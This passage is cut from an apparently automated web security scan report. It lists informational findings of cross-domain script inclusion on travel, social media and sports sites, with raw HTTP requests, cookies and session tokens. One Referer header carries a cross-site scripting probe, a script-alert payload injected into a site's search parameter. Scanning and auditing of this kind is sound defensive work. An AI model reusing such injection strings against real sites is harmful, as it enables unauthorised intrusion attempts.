38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
20.48. http://www.booking.com/searchresults.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>
...[SNIP]...
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>
...[SNIP]...
20.49. http://www.cheaptickets.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
20.50. http://www.cmegroup.com/advance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /advance/ HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1315448948.1; __utmz=239709073.1315448948.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9275
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601599674056; path=/; max-age=1209600; domain=.cmegroup.com; version=1


<!DOCTYPE html>
<html lang="en-us" class="no-js">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="fragment" content="!">

   
...[SNIP]...
</a><script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</footer>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
20.51. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?api_key=120836677942069&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22fd1ef3c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=false&height=60&id=51212153078&locale=en_US&sdk=joey&show_faces=false&stream=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.119.45
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:49 GMT
Content-Length: 7701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/CqGiwf44cv7.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/i6dwhw2w3_E.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/2a5cp8CEPck.js"></script>
...[SNIP]...
20.52. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fmanchesterunited&width=303&colorscheme=dark&connections=0&stream=no&header=no&height=60 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.110.60
X-Cnection: close
Date: Mon, 03 Oct 2011 01:56:33 GMT
Content-Length: 8605

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
20.53. http://www.getaroom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; show_pu=pageview=0&allowed=true&shown=false; www_session=BAh7CToLc2VhcmNoaQM79eU6D3Nlc3Npb25faWQiJTRmMGJjNjU4OGRkNTY4ZGQwMjcyYjU3Njg0OGRlNmYxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6C25vdGljZSImUGxlYXNlIGVudGVyIGEgdmFsaWQgZGVzdGluYXRpb24uBjoKQHVzZWR7BjsIRjoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--bc19aecb2a0c7d888b60a967615bd73985c6d315

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "f57a77ed77550a00b9eb6450a79c54dc"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 299
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 88588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
</script>


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=getaroomcom"></script>
...[SNIP]...
20.54. http://www.goal.com/en/comment/comments-box  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/comment/comments-box

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/comment/comments-box?allCommentsUrl=%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run%2Fcomments&entityId=13994828 HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:56 GMT
Expires: Sat, 01 Oct 2011 23:58:55 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:55 GMT
Server: ECS (sjo/5225)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar
Content-Length: 7224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
<meta name="layout" content="include"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
20.55. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
